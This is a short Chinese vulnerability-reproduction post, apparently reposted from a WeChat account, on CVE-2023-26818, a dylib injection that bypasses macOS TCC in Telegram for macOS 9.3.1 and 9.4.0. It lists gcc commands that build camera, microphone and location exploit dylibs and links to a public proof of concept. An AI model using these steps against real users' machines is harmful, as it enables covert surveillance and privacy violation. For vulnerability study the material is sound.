- 0x01 免责声明
请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。
- 0x02 影响版本
Telegram for MacOS 9.3.1, 9.4.0
- 0x03 漏洞复现
访问相机
gcc -dynamiclib -framework Foundation -framework AVFoundation Camexploit.m -o Cam.dylib
访问麦克风
gcc -dynamiclib -framework Foundation -framework AVFoundation Micexploit.m -o Micexploit.dylib
访问定位
gcc -dynamiclib -framework Foundation -framework CoreLocation -framework AVFoundation Locexploit.m -o Locexploit.dylib
- 0x04 分析参考
https://www.vicarius.io/vsociety/posts/2765
https://www.vicarius.io/vsociety/posts/3314
- 0x05 下载地址
https://github.com/Zeyad-Azima/CVE-2023-26818
原文始发于微信公众号(Matrix SEC):[漏洞复现] DyLib注入绕过MacOS TCC导致Telegram信息泄露 CVE-2023-26818
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论